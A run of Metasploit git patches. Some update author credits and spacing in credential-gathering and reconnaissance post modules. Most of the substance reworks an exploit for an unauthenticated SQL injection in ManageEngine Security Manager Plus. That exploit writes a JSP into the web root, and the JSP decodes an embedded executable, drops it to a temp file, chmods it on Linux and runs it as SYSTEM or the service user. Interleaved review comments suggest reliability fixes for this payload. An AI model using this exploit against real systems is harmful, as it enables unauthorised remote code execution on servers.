@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Post 'Loic Jaquemet ', 'scriptmonkey ', 'theLightCosine', - 'Rob Fuller ' #domain/dc enumeration code + 'mubix' #domain/dc enumeration code ], 'References' => [ diff --git a/modules/post/windows/gather/credentials/mremote.rb b/modules/post/windows/gather/credentials/mremote.rb index 25bece5d7a..041a73a45f 100644 --- a/modules/post/windows/gather/credentials/mremote.rb +++ b/modules/post/windows/gather/credentials/mremote.rb @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Post [ 'theLightCosine', 'hdm', #Helped write the Decryption Routine - 'Rob Fuller ' #Helped write the Decryption Routine + 'mubix' #Helped write the Decryption Routine ], 'Version' => '$Revision$', 'Platform' => [ 'windows' ], diff --git a/modules/post/windows/gather/credentials/vnc.rb b/modules/post/windows/gather/credentials/vnc.rb index 1bf93f654e..0a31c63fd4 100644 --- a/modules/post/windows/gather/credentials/vnc.rb +++ b/modules/post/windows/gather/credentials/vnc.rb @@ -30,8 +30,10 @@ class Metasploit3 < Msf::Post This module extract DES encrypted passwords in known VNC locations }, 'License' => MSF_LICENSE, - 'Author' => ['Kurt Grutzmacher ', - 'Rob Fuller '], + 'Author' => [ + 'Kurt Grutzmacher ', + 'mubix' + ], 'Version' => '$Revision$', 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ] diff --git a/modules/post/windows/gather/enum_domains.rb b/modules/post/windows/gather/enum_domains.rb index ceb18b1865..1ed481a319 100644 --- a/modules/post/windows/gather/enum_domains.rb +++ b/modules/post/windows/gather/enum_domains.rb @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Post controllers for that domain. }, 'License' => MSF_LICENSE, - 'Author' => [ 'Rob Fuller '], + 'Author' => [ 'mubix' ], 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/enum_proxy.rb b/modules/post/windows/gather/enum_proxy.rb index 44867f13e2..d6f62b70e6 100644 --- a/modules/post/windows/gather/enum_proxy.rb 
+++ b/modules/post/windows/gather/enum_proxy.rb @@ -24,7 +24,7 @@ class Metasploit3 < Msf::Post are set it pulls the current user, else it will pull the user's settings specified SID and target host. }, - 'Author' => [ 'mubix ' ], + 'Author' => [ 'mubix' ], 'License' => MSF_LICENSE, 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ] diff --git a/modules/post/windows/gather/enum_termserv.rb b/modules/post/windows/gather/enum_termserv.rb index e779647c46..44f0f4d969 100644 --- a/modules/post/windows/gather/enum_termserv.rb +++ b/modules/post/windows/gather/enum_termserv.rb @@ -30,7 +30,7 @@ class Metasploit3 < Msf::Post This module dumps MRU and connection data for RDP sessions }, 'License' => MSF_LICENSE, - 'Author' => ['Rob Fuller '], + 'Author' => [ 'mubix' ], 'Version' => '$Revision$', 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ] diff --git a/modules/post/windows/gather/reverse_lookup.rb b/modules/post/windows/gather/reverse_lookup.rb index 3b2cc39299..363aaf9f76 100644 --- a/modules/post/windows/gather/reverse_lookup.rb +++ b/modules/post/windows/gather/reverse_lookup.rb @@ -25,7 +25,7 @@ class Metasploit3 < Msf::Post 'Version' => '$Revision$', 'Platform' => ['windows'], 'SessionTypes' => ['meterpreter'], - 'Author' => ['mubix'] + 'Author' => [ 'mubix' ] )) register_options( [ diff --git a/modules/post/windows/gather/tcpnetstat.rb b/modules/post/windows/gather/tcpnetstat.rb index 1030111a8b..d1eafb072f 100644 --- a/modules/post/windows/gather/tcpnetstat.rb +++ b/modules/post/windows/gather/tcpnetstat.rb @@ -25,7 +25,7 @@ class Metasploit3 < Msf::Post 'Name' => 'Windows Gather TCP Netstat', 'Description' => %q{ This Module lists current TCP sessions}, 'License' => MSF_LICENSE, - 'Author' => [ 'Rob Fuller '], + 'Author' => [ 'mubix' ], 'Version' => '$Revision$', 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter'] 
diff --git a/modules/post/windows/manage/clone_proxy_settings.rb b/modules/post/windows/manage/clone_proxy_settings.rb index 2ea6c63d5b..4393ed8716 100644 --- a/modules/post/windows/manage/clone_proxy_settings.rb +++ b/modules/post/windows/manage/clone_proxy_settings.rb @@ -24,7 +24,7 @@ class Metasploit3 < Msf::Post targeted user SID, supports remote hosts as well if remote registry is allowed. }, - 'Author' => [ 'mubix ' ], + 'Author' => [ 'mubix' ], 'License' => MSF_LICENSE, 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ] diff --git a/modules/post/windows/recon/computer_browser_discovery.rb b/modules/post/windows/recon/computer_browser_discovery.rb index cda59b745e..9fdfd36568 100644 --- a/modules/post/windows/recon/computer_browser_discovery.rb +++ b/modules/post/windows/recon/computer_browser_discovery.rb @@ -27,7 +27,7 @@ class Metasploit3 < Msf::Post WINDOWS (all Windows hosts), or UNIX (all Unix hosts). }, 'License' => MSF_LICENSE, - 'Author' => [ 'Rob Fuller '], + 'Author' => [ 'mubix' ], 'Version' => '$Revision$', 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ] diff --git a/modules/post/windows/recon/resolve_hostname.rb b/modules/post/windows/recon/resolve_hostname.rb index 4bf64294a5..9e9b2006ae 100644 --- a/modules/post/windows/recon/resolve_hostname.rb +++ b/modules/post/windows/recon/resolve_hostname.rb @@ -15,7 +15,7 @@ class Metasploit3 < Msf::Post 'Name' => 'Windows Recon Resolve Hostname', 'Description' => %q{ This module resolves a hostname to IP address via the victim, similiar to the Unix dig command}, 'License' => MSF_LICENSE, - 'Author' => [ 'mubix '], + 'Author' => [ 'mubix' ], 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/recon/resolve_ip.rb b/modules/post/windows/recon/resolve_ip.rb index 56c05c1a35..792c68454a 100644 --- a/modules/post/windows/recon/resolve_ip.rb +++ b/modules/post/windows/recon/resolve_ip.rb 
@@ -19,7 +19,7 @@ class Metasploit3 < Msf::Post 'Name' => 'Windows Recon Resolve IP', 'Description' => %q{ This module reverse resolves a range or IP to a hostname}, 'License' => MSF_LICENSE, - 'Author' => [ 'mubix '], + 'Author' => [ 'mubix' ], 'Version' => '$Revision$', 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ] From 7d531dcbba6a16c6ad150a28692ff4ba09e16048 Mon Sep 17 00:00:00 2001 From: Rob Fuller Date: Mon, 22 Oct 2012 17:07:58 -0400 Subject: [PATCH 31/74] fix spacing --- lib/msf/core/module/author.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/module/author.rb b/lib/msf/core/module/author.rb index 81ade99a2e..40cb980781 100644 --- a/lib/msf/core/module/author.rb +++ b/lib/msf/core/module/author.rb @@ -44,7 +44,7 @@ class Msf::Module::Author 'Carlos Perez' => 'carlos_perez' + 0x40.chr + 'darkoperator.com', 'juan vazquez' => 'juan.vazquez' + 0x40.chr + 'metasploit.com', 'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com', - 'mubix' => 'mubix' + 0x40.chr + 'hak5.org' + 'mubix' => 'mubix' + 0x40.chr + 'hak5.org' } # From e84abef63b67b4e999913e3ad2a23ec57b4363be Mon Sep 17 00:00:00 2001 From: Rob Fuller Date: Mon, 22 Oct 2012 17:22:37 -0400 Subject: [PATCH 32/74] fix spacing for all authors --- lib/msf/core/module/author.rb | 66 +++++++++++++++++------------------ 1 file changed, 33 insertions(+), 33 deletions(-) diff --git a/lib/msf/core/module/author.rb b/lib/msf/core/module/author.rb index 40cb980781..adee15d752 100644 --- a/lib/msf/core/module/author.rb +++ b/lib/msf/core/module/author.rb 
@@ -12,39 +12,39 @@ class Msf::Module::Author # A hash of known author names Known = { - 'hdm' => 'hdm' + 0x40.chr + 'metasploit.com', - 'spoonm' => 'spoonm' + 0x40.chr + 'no$email.com', - 'skape' => 'mmiller' + 0x40.chr + 'hick.org', - 'vlad902' => 'vlad902' + 0x40.chr + 'gmail.com', - 'optyx' => 'optyx' + 0x40.chr + 'no$email.com', - 'anonymous' => 'anonymous-contributor' + 0x40.chr + 'metasploit.com', - 'stinko' => 'vinnie' + 0x40.chr + 'metasploit.com', - 'MC' => 'mc' + 0x40.chr + 'metasploit.com', - 'cazz' => 'bmc' + 0x40.chr + 'shmoo.com', - 'pusscat' => 'pusscat' + 0x40.chr + 'metasploit.com', - 'skylined' => 'skylined' + 0x40.chr + 'edup.tudelft.nl', - 'patrick' => 'patrick' + 0x40.chr + 'osisecurity.com.au', - 'Ramon de C Valle'=> 'rcvalle' + 0x40.chr + 'metasploit.com', - 'I)ruid' => 'druid' + 0x40.chr + 'caughq.org', - 'egypt' => 'egypt' + 0x40.chr + 'metasploit.com', - 'kris katterjohn' => 'katterjohn' + 0x40.chr + 'gmail.com', - 'CG' => 'cg' + 0x40.chr + 'carnal0wnage.com', - 'et' => 'et' + 0x40.chr + 'metasploit.com', - 'sf' => 'stephen_fewer' + 0x40.chr + 'harmonysecurity.com', - 'kf' => 'kf_list' + 0x40.chr + 'digitalmunition.com', - 'ddz' => 'ddz' + 0x40.chr + 'theta44.org', - 'jduck' => 'jduck' + 0x40.chr + 'metasploit.com', - 'natron' => 'natron' + 0x40.chr + 'metasploit.com', - 'todb' => 'todb' + 0x40.chr + 'metasploit.com', - 'msmith' => 'msmith' + 0x40.chr + 'metasploit.com', - 'jcran' => 'jcran' + 0x40.chr + 'metasploit.com', - 'sinn3r' => 'sinn3r' + 0x40.chr + 'metasploit.com', - 'bannedit' => 'bannedit' + 0x40.chr + 'metasploit.com', - 'amaloteaux' => 'alex_maloteaux' + 0x40.chr + 'metasploit.com', - 'Carlos Perez' => 'carlos_perez' + 0x40.chr + 'darkoperator.com', - 'juan vazquez' => 'juan.vazquez' + 0x40.chr + 'metasploit.com', - 'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com', - 'mubix' => 'mubix' + 0x40.chr + 'hak5.org' + 'hdm' => 'hdm' + 0x40.chr + 'metasploit.com', + 'spoonm' => 'spoonm' + 0x40.chr + 'no$email.com', 
+ 'skape' => 'mmiller' + 0x40.chr + 'hick.org', + 'vlad902' => 'vlad902' + 0x40.chr + 'gmail.com', + 'optyx' => 'optyx' + 0x40.chr + 'no$email.com', + 'anonymous' => 'anonymous-contributor' + 0x40.chr + 'metasploit.com', + 'stinko' => 'vinnie' + 0x40.chr + 'metasploit.com', + 'MC' => 'mc' + 0x40.chr + 'metasploit.com', + 'cazz' => 'bmc' + 0x40.chr + 'shmoo.com', + 'pusscat' => 'pusscat' + 0x40.chr + 'metasploit.com', + 'skylined' => 'skylined' + 0x40.chr + 'edup.tudelft.nl', + 'patrick' => 'patrick' + 0x40.chr + 'osisecurity.com.au', + 'Ramon de C Valle' => 'rcvalle' + 0x40.chr + 'metasploit.com', + 'I)ruid' => 'druid' + 0x40.chr + 'caughq.org', + 'egypt' => 'egypt' + 0x40.chr + 'metasploit.com', + 'kris katterjohn' => 'katterjohn' + 0x40.chr + 'gmail.com', + 'CG' => 'cg' + 0x40.chr + 'carnal0wnage.com', + 'et' => 'et' + 0x40.chr + 'metasploit.com', + 'sf' => 'stephen_fewer' + 0x40.chr + 'harmonysecurity.com', + 'kf' => 'kf_list' + 0x40.chr + 'digitalmunition.com', + 'ddz' => 'ddz' + 0x40.chr + 'theta44.org', + 'jduck' => 'jduck' + 0x40.chr + 'metasploit.com', + 'natron' => 'natron' + 0x40.chr + 'metasploit.com', + 'todb' => 'todb' + 0x40.chr + 'metasploit.com', + 'msmith' => 'msmith' + 0x40.chr + 'metasploit.com', + 'jcran' => 'jcran' + 0x40.chr + 'metasploit.com', + 'sinn3r' => 'sinn3r' + 0x40.chr + 'metasploit.com', + 'bannedit' => 'bannedit' + 0x40.chr + 'metasploit.com', + 'amaloteaux' => 'alex_maloteaux' + 0x40.chr + 'metasploit.com', + 'Carlos Perez' => 'carlos_perez' + 0x40.chr + 'darkoperator.com', + 'juan vazquez' => 'juan.vazquez' + 0x40.chr + 'metasploit.com', + 'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com', + 'mubix' => 'mubix' + 0x40.chr + 'hak5.org' } # From 5c9b33b8fd18830e4378b2413aec0729f26b2c0a Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 22 Oct 2012 17:18:14 -0500 Subject: [PATCH 33/74] Add a missing post require --- modules/post/windows/gather/enum_proxy.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) 
diff --git a/modules/post/windows/gather/enum_proxy.rb b/modules/post/windows/gather/enum_proxy.rb index d6f62b70e6..60ed0233dc 100644 --- a/modules/post/windows/gather/enum_proxy.rb +++ b/modules/post/windows/gather/enum_proxy.rb @@ -10,6 +10,7 @@ ## require 'msf/core' +require 'msf/core/post/windows/services' class Metasploit3 < Msf::Post @@ -108,4 +109,4 @@ class Metasploit3 < Msf::Post end -end \ No newline at end of file +end From 923ffe277dff66a2712a9f68f42cf1dcb2b742c6 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 23 Oct 2012 11:32:09 -0500 Subject: [PATCH 34/74] Write EXE to JSP instead of using a TCPServer --- .../windows/http/manageengine_search_sqli.rb | 75 +++++-------------- 1 file changed, 18 insertions(+), 57 deletions(-) diff --git a/modules/exploits/windows/http/manageengine_search_sqli.rb b/modules/exploits/windows/http/manageengine_search_sqli.rb index 7d22cb3ab0..df64d9b802 100644 --- a/modules/exploits/windows/http/manageengine_search_sqli.rb +++ b/modules/exploits/windows/http/manageengine_search_sqli.rb @@ -11,7 +11,6 @@ class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::Remote::TcpServer include Msf::Exploit::EXE def initialize(info={}) @@ -19,10 +18,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => "ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection", 'Description' => %q{ This module exploits a SQL injection found in ManageEngine Security Manager Plus - advanced search page. It will send a malicious SQL query to create a JSP file - under the web root directory, and then let it download and execute our malicious - executable under the context of SYSTEM. Authentication is not required in order - to exploit this vulnerability. + advanced search page, which results in remote code execution under the context of + SYSTEM. Authentication is not required in order to exploit this vulnerability. }, 'License' => MSF_LICENSE, 'Author' => 
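Review bot: Removing `include Msf::Exploit::Remote::TcpServer` in the first manageengine hunk drops the mixin that, as far as I can tell, registers the `SRVHOST`/`SRVPORT` options, yet the JSP generator in the later hunk (`@@ -104,43 +91,30 @@`) still derives `my_host` and `my_port` from `datastore['SRVHOST']` and `datastore['SRVPORT']`; with no server left to connect back to those two assignments are dead code and should go with the include (or, if the options are registered elsewhere in the module, that registration should be removed too so the options no longer appear in `show options`). The rewritten description no longer says that a JSP is written under the web root and that the payload is dropped on disk via `File.createTempFile(..., ".exe")`; keeping one sentence about those on-disk artifacts, e.g. `Note: a JSP under the web root and a temporary .exe are left on the target and need manual cleanup.`, helps operators clean up afterwards. The `initialize` body the description hunk sits in continues outside the hunk.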
@@ -87,16 +84,6 @@ class Metasploit3 < Msf::Exploit::Remote end - # - # Transfer the malicious executable to our victim - # - def on_client_connect(cli) - print_status("#{cli.peerhost}:#{cli.peerport} - Sending executable (#{@native_payload.length} bytes)") - cli.put(@native_payload) - service.close_client(cli) - end - - # # Generate a download+exe JSP payload # 
@@ -104,43 +91,30 @@ class Metasploit3 < Msf::Exploit::Remote my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST'] my_port = datastore['SRVPORT'] - var_buf = Rex::Text.rand_text_alpha(rand(8) + 3) - var_shellcode = Rex::Text.rand_text_alpha(rand(8) + 3) - var_outstream = Rex::Text.rand_text_alpha(rand(8) + 3) - var_socket = Rex::Text.rand_text_alpha(rand(8) + 3) - var_bufreader = Rex::Text.rand_text_alpha(rand(8) + 3) - var_decoder = Rex::Text.rand_text_alpha(rand(8) + 3) - var_temp = Rex::Text.rand_text_alpha(rand(8) + 3) - var_path = Rex::Text.rand_text_alpha(rand(8) + 3) - var_proc = Rex::Text.rand_text_alpha(rand(8) + 3) + native_payload = Rex::Text.encode_base64(generate_payload_exe) + native_payload_name = rand_text_alpha(rand(6)+3) jsp = %Q| <%@page import="java.io.*"%> - <%@page import="java.net.*"%> <%@page import="sun.misc.BASE64Decoder"%> <% - StringBuffer #{var_buf} = new StringBuffer(); - byte[] #{var_shellcode} = null; - BufferedOutputStream #{var_outstream} = null; + byte[] shellcode = null; + BufferedOutputStream outstream = null; try { - Socket #{var_socket} = new Socket("#{my_host}", #{my_port}); - BufferedReader #{var_bufreader} = new BufferedReader(new InputStreamReader(#{var_socket}.getInputStream())); - while (#{var_buf}.length() < #{@native_payload.length}) { - #{var_buf}.append( (char) #{var_bufreader}.read()); - } + String buf = "#{native_payload}"; - BASE64Decoder #{var_decoder} = new BASE64Decoder(); - #{var_shellcode} = #{var_decoder}.decodeBuffer(#{var_buf}.toString()); + BASE64Decoder decoder = new BASE64Decoder(); + shellcode = decoder.decodeBuffer(buf.toString()); - File #{var_temp} = File.createTempFile("#{@native_payload_name}", ".exe"); - String #{var_path} = #{var_temp}.getAbsolutePath(); + File temp = File.createTempFile("#{native_payload_name}", ".exe"); + String path = temp.getAbsolutePath(); - #{var_outstream} = new BufferedOutputStream(new 
FileOutputStream(#{var_path})); - #{var_outstream}.write(#{var_shellcode}); - #{var_outstream}.close(); + outstream = new BufferedOutputStream(new FileOutputStream(path)); + outstream.write(shellcode); + outstream.close(); - Process #{var_proc} = Runtime.getRuntime().exec(#{var_path}); + Process p = Runtime.getRuntime().exec(path); } catch (Exception e) {} %> | @@ -156,9 +130,6 @@ class Metasploit3 < Msf::Exploit::Remote # Run the actual exploit # def inject_exec - # This little lag is meant to ensure the TCP server runs first before the requests - select(nil, nil, nil, 1) - # Inject our JSP payload hex_jsp = generate_jsp_payload @@ -211,19 +182,9 @@ class Metasploit3 < Msf::Exploit::Remote # The server must start first, and then we send the malicious requests # def exploit - # Avoid passing this as an argument for performance reasons - # This is in base64 is make sure our file isn't mangled - @native_payload = [generate_payload_exe].pack("m*") - @native_payload_name = rand_text_alpha(rand(6)+3) - @jsp_name = rand_text_alpha(rand(6)+3) - @outpath = "\"../../webapps/SecurityManager/#{@jsp_name + '.jsp'}\"" + @jsp_name = rand_text_alpha(rand(6)+3) + @outpath = "\"../../webapps/SecurityManager/#{@jsp_name + '.jsp'}\"" - begin - t = framework.threads.spawn("reqs", false) { inject_exec } - print_status("Serving executable on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}") - super - ensure - t.kill - end + inject_exec end end \ No newline at end of file From bc3472a9b9fd34ce4179d10ca3d635de3783f8e6 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 23 Oct 2012 11:41:53 -0500 Subject: [PATCH 35/74] Randomize variable names --- .../windows/http/manageengine_search_sqli.rb | 32 ++++++++++++------- 1 file changed, 20 insertions(+), 12 deletions(-) diff --git a/modules/exploits/windows/http/manageengine_search_sqli.rb b/modules/exploits/windows/http/manageengine_search_sqli.rb index df64d9b802..bcf7366b28 100644 --- a/modules/exploits/windows/http/manageengine_search_sqli.rb 
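Review bot: `my_host` and `my_port` at the top of generate_jsp_payload are dead once the TCP download path is gone, and they read SRVHOST/SRVPORT, options that the `Msf::Exploit::Remote::TcpServer` mixin removed in this same commit used to register, so they will evaluate to nil; drop both lines. The whole base64 executable is now placed in a single Java string literal (`String #{var_buf} = "#{native_payload}"`); a Java class-file string constant is capped at 65535 bytes, so a larger generated executable would presumably fail JSP compilation, and neither the `catch (Exception e) {}` at the end of the scriptlet nor inject_exec, which ignores the response to `send_request_raw`, would surface that. Consider a size check on `native_payload` before the injection, or splitting the literal across several concatenated strings. The method body continues outside the hunk.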
+++ b/modules/exploits/windows/http/manageengine_search_sqli.rb @@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote # - # Generate a download+exe JSP payload + # Embeds our executable in JSP # def generate_jsp_payload my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST'] 
@@ -94,27 +94,35 @@ class Metasploit3 < Msf::Exploit::Remote native_payload = Rex::Text.encode_base64(generate_payload_exe) native_payload_name = rand_text_alpha(rand(6)+3) + var_raw = Rex::Text.rand_text_alpha(rand(8) + 3) + var_ostream = Rex::Text.rand_text_alpha(rand(8) + 3) + var_buf = Rex::Text.rand_text_alpha(rand(8) + 3) + var_decoder = Rex::Text.rand_text_alpha(rand(8) + 3) + var_tmp = Rex::Text.rand_text_alpha(rand(8) + 3) + var_path = Rex::Text.rand_text_alpha(rand(8) + 3) + var_proc = Rex::Text.rand_text_alpha(rand(8) + 3) + jsp = %Q| <%@page import="java.io.*"%> <%@page import="sun.misc.BASE64Decoder"%> <% - byte[] shellcode = null; - BufferedOutputStream outstream = null; + byte[] #{var_raw} = null; + BufferedOutputStream #{var_ostream} = null; try { - String buf = "#{native_payload}"; + String #{var_buf} = "#{native_payload}"; - BASE64Decoder decoder = new BASE64Decoder(); - shellcode = decoder.decodeBuffer(buf.toString()); + BASE64Decoder #{var_decoder} = new BASE64Decoder(); + #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString()); - File temp = File.createTempFile("#{native_payload_name}", ".exe"); - String path = temp.getAbsolutePath(); + File #{var_tmp} = File.createTempFile("#{native_payload_name}", ".exe"); + String #{var_path} = #{var_tmp}.getAbsolutePath(); - outstream = new BufferedOutputStream(new FileOutputStream(path)); - outstream.write(shellcode); - outstream.close(); + #{var_ostream} = new BufferedOutputStream(new FileOutputStream(#{var_path})); + #{var_ostream}.write(#{var_raw}); + #{var_ostream}.close(); - Process p = Runtime.getRuntime().exec(path); + Process #{var_proc} = Runtime.getRuntime().exec(#{var_path}); } catch (Exception e) {} %> | From e05d353e8a9e11a52a901c699f7b2ee08ec2b2a8 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 23 Oct 2012 12:40:13 -0500 Subject: [PATCH 36/74] Add Linux support --- .../windows/http/manageengine_search_sqli.rb | 35 +++++++++++++------ 1 file changed, 24 insertions(+), 11 deletions(-) 
diff --git a/modules/exploits/windows/http/manageengine_search_sqli.rb b/modules/exploits/windows/http/manageengine_search_sqli.rb index bcf7366b28..b184b96936 100644 --- a/modules/exploits/windows/http/manageengine_search_sqli.rb +++ b/modules/exploits/windows/http/manageengine_search_sqli.rb @@ -25,21 +25,22 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'xistence ', # Discovery & Metasploit module - 'sinn3r' # Improved Metasploit module + 'sinn3r', # Improved Metasploit module + 'egypt' # Improved Metasploit module ], 'References' => [ ['EDB','22094'], ['BID', '56138'] ], - 'Platform' => 'win', + #'Platform' => ['win', 'linux'], 'Targets' => [ - ['Windows Universal', {}] + ['Windows', { 'Arch' => ARCH_X86, 'Platform' => 'win' }], + ['Linux', { 'Arch' => ARCH_X86, 'Platform' => 'linux' }] ], 'Privileged' => false, - 'DisclosureDate' => "Oct 18 2012", - 'DefaultTarget' => 0)) + 'DisclosureDate' => "Oct 18 2012")) register_options( [ @@ -92,7 +93,8 @@ class Metasploit3 < Msf::Exploit::Remote my_port = datastore['SRVPORT'] native_payload = Rex::Text.encode_base64(generate_payload_exe) - native_payload_name = rand_text_alpha(rand(6)+3) + native_payload_name = Rex::Text.rand_text_alpha(rand(6)+3) + ext = (target['Platform'] == 'win') ? '.exe' : '.bin' var_raw = Rex::Text.rand_text_alpha(rand(8) + 3) var_ostream = Rex::Text.rand_text_alpha(rand(8) + 3) @@ -100,7 +102,17 @@ class Metasploit3 < Msf::Exploit::Remote var_decoder = Rex::Text.rand_text_alpha(rand(8) + 3) var_tmp = Rex::Text.rand_text_alpha(rand(8) + 3) var_path = Rex::Text.rand_text_alpha(rand(8) + 3) - var_proc = Rex::Text.rand_text_alpha(rand(8) + 3) + var_proc2 = Rex::Text.rand_text_alpha(rand(8) + 3) + + if target['Platform'] == 'linux' + var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3) + chmod = %Q| + Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path}); + Thread.sleep(200); + | + else + chmod = '' + end jsp = %Q| <%@page import="java.io.*"%> 
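Review bot: The Linux branch added to generate_jsp_payload runs `chmod 777` and then relies on a fixed `Thread.sleep(200)` for the permission change to land before `exec(#{var_path})`; under load the exec can still race the chmod, and 777 makes the dropped binary world-writable for no benefit. Wait for the chmod instead of sleeping and use the array form: `Runtime.getRuntime().exec(new String[]{"chmod", "700", #{var_path}}).waitFor();` — the array form also keeps a temp directory containing spaces from being split into separate arguments. The method's body continues outside the hunk.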
@@ -115,15 +127,16 @@ class Metasploit3 < Msf::Exploit::Remote BASE64Decoder #{var_decoder} = new BASE64Decoder(); #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString()); - File #{var_tmp} = File.createTempFile("#{native_payload_name}", ".exe"); + File #{var_tmp} = File.createTempFile("#{native_payload_name}", "#{ext}"); String #{var_path} = #{var_tmp}.getAbsolutePath(); #{var_ostream} = new BufferedOutputStream(new FileOutputStream(#{var_path})); #{var_ostream}.write(#{var_raw}); #{var_ostream}.close(); - - Process #{var_proc} = Runtime.getRuntime().exec(#{var_path}); - } catch (Exception e) {} + #{chmod} + Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path}); + } catch (Exception e) { + } %> | From 5f088fa71847a90c01686fd4cafaf01d987390ab Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 23 Oct 2012 12:41:17 -0500 Subject: [PATCH 37/74] Remove default platform --- modules/exploits/windows/http/manageengine_search_sqli.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/windows/http/manageengine_search_sqli.rb b/modules/exploits/windows/http/manageengine_search_sqli.rb index b184b96936..2fde8ffac4 100644 --- a/modules/exploits/windows/http/manageengine_search_sqli.rb +++ b/modules/exploits/windows/http/manageengine_search_sqli.rb @@ -33,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote ['EDB','22094'], ['BID', '56138'] ], - #'Platform' => ['win', 'linux'], 'Targets' => [ ['Windows', { 'Arch' => ARCH_X86, 'Platform' => 'win' }], From 3ff888a5c056f28addbbee7f5e2a12751b0187de Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 23 Oct 2012 12:41:51 -0500 Subject: [PATCH 38/74] Move to 'multi' because it supports windows and linux --- .../exploits/{windows => multi}/http/manageengine_search_sqli.rb | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/exploits/{windows => multi}/http/manageengine_search_sqli.rb (100%) 
diff --git a/modules/exploits/windows/http/manageengine_search_sqli.rb b/modules/exploits/multi/http/manageengine_search_sqli.rb similarity index 100% rename from modules/exploits/windows/http/manageengine_search_sqli.rb rename to modules/exploits/multi/http/manageengine_search_sqli.rb From bef453991529520303025a1ed10f1a02f65b5cfe Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 23 Oct 2012 12:47:46 -0500 Subject: [PATCH 39/74] Update description --- modules/exploits/multi/http/manageengine_search_sqli.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/manageengine_search_sqli.rb b/modules/exploits/multi/http/manageengine_search_sqli.rb index 2fde8ffac4..71729a7960 100644 --- a/modules/exploits/multi/http/manageengine_search_sqli.rb +++ b/modules/exploits/multi/http/manageengine_search_sqli.rb @@ -19,7 +19,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Description' => %q{ This module exploits a SQL injection found in ManageEngine Security Manager Plus advanced search page, which results in remote code execution under the context of - SYSTEM. Authentication is not required in order to exploit this vulnerability. + SYSTEM in Windows; or as the user in Linux. Authentication is not required in order + to exploit this vulnerability. }, 'License' => MSF_LICENSE, 'Author' => From 4c41319c7cc1e74ee9df3b2d94ba6d037bd5d7c3 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 23 Oct 2012 12:55:43 -0500 Subject: [PATCH 40/74] Remove unused vars --- modules/exploits/multi/http/manageengine_search_sqli.rb | 3 --- 1 file changed, 3 deletions(-) diff --git a/modules/exploits/multi/http/manageengine_search_sqli.rb b/modules/exploits/multi/http/manageengine_search_sqli.rb index 71729a7960..51331bd52e 100644 --- a/modules/exploits/multi/http/manageengine_search_sqli.rb +++ b/modules/exploits/multi/http/manageengine_search_sqli.rb 
@@ -89,9 +89,6 @@ class Metasploit3 < Msf::Exploit::Remote # Embeds our executable in JSP # def generate_jsp_payload - my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST'] - my_port = datastore['SRVPORT'] - native_payload = Rex::Text.encode_base64(generate_payload_exe) native_payload_name = Rex::Text.rand_text_alpha(rand(6)+3) ext = (target['Platform'] == 'win') ? '.exe' : '.bin' From 22223d5d8188a18c37c296f7ddc182a709d3cbf4 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 23 Oct 2012 13:58:19 -0500 Subject: [PATCH 41/74] Better cleanup abilities --- .../multi/http/manageengine_search_sqli.rb | 30 +++++++++++++++---- 1 file changed, 24 insertions(+), 6 deletions(-) diff --git a/modules/exploits/multi/http/manageengine_search_sqli.rb b/modules/exploits/multi/http/manageengine_search_sqli.rb index 51331bd52e..066b8f5371 100644 --- a/modules/exploits/multi/http/manageengine_search_sqli.rb +++ b/modules/exploits/multi/http/manageengine_search_sqli.rb 
